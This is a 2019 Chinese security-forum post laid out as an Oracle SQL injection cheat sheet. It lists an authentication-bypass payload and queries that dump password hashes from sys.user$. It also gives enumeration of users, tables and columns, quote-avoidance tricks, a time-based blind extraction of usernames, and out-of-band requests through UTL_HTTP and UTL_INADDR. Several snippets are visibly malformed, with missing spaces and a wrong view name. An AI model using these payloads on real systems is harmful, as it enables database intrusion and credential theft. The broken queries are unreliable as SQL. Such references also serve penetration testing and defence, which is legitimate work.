默认数据库
注释--
SELECT * FROM Users WHERE username = '' OR1=1 --' AND password = '';
查询版本信息
| SELECT banner FROM v$version WHERE banner LIKE 'Oracle%'; | SELECT banner FROM v$version WHERE banner LIKE 'TNS%'; | SELECT version FROM v$instance; |
数据库凭证| SELECT username FROM all_users; | | SELECT name, password from sys.user$; | | SELECT name, spare4 from sys.user$; | |
查询数据库信息查询当前库| SELECT name FROM v$database; | SELECT instance_name FROM v$instance | SELECT global_name FROM global_name | SELECT SYS.DATABASE_NAME FROM DUAL |
用户数据库| SELECT DISTINCT owner FROM all_tables; |
主机名称| SELECT host_name FROM v$instance; (Privileged) | SELECT UTL_INADDR.get_host_name FROM dual; | SELECT UTL_INADDR.get_host_name('10.0.0.1') FROM dual; | SELECT UTL_INADDR.get_host_address FROM dual; |
查询表和列查询表| SELECT table_name FROM all_tables; |
查询列SELECT column_name FROMall_tab_columns;
从列中查询表SELECT column_name FROM all_tab_columns WHEREtable_name = 'Users';
从表中查询列SELECT table_name FROMall_tab_tables WHERE column_name = 'password';
查询多个表信息| SELECT RTRIM(XMLAGG(XMLELEMENT(e, table_name || ',')).EXTRACT('//text()').EXTRACT('//text()') ,',') FROM all_tables; |
避免使用引号| SELECT 0x09120911091 FROM dual; | | SELECT CHR(32)||CHR(92)||CHR(93) FROM dual; | |
字符串拼接| SELECT 'a'||'d'||'mi'||'n' FROM dual; |
条件语句| SELECT CASE WHEN 1=1 THEN 'true' ELSE 'false' END FROM dual |
时间注入SELECTUTL_INADDR.get_host_address('non-existant-domain.com') FROM dual;
AND (SELECT COUNT(*) FROM all_users t1, all_userst2, all_users t3, all_users t4, all_users t5) > 0 AND 300 >ASCII(SUBSTR((SELECT username FROM all_users WHERE rownum = 1),1,1));
查询权限
| SELECT privilege FROM session_privs; | SELECT grantee, granted_role FROM dba_role_privs; (Privileged) |
DNS带外| SELECT UTL_HTTP.REQUEST('http://localhost') FROM dual; | SELECT UTL_INADDR.get_host_address('localhost.com') FROM dual; |
| 
|小黑屋|手机版|中国白客联盟-BUC
( 赣ICP备15007148号-6 ) 
窥视卡
雷达卡
发表于 2019-11-9 17:51:09
提升卡
置顶卡
沉默卡
喧嚣卡
变色卡
千斤顶
显身卡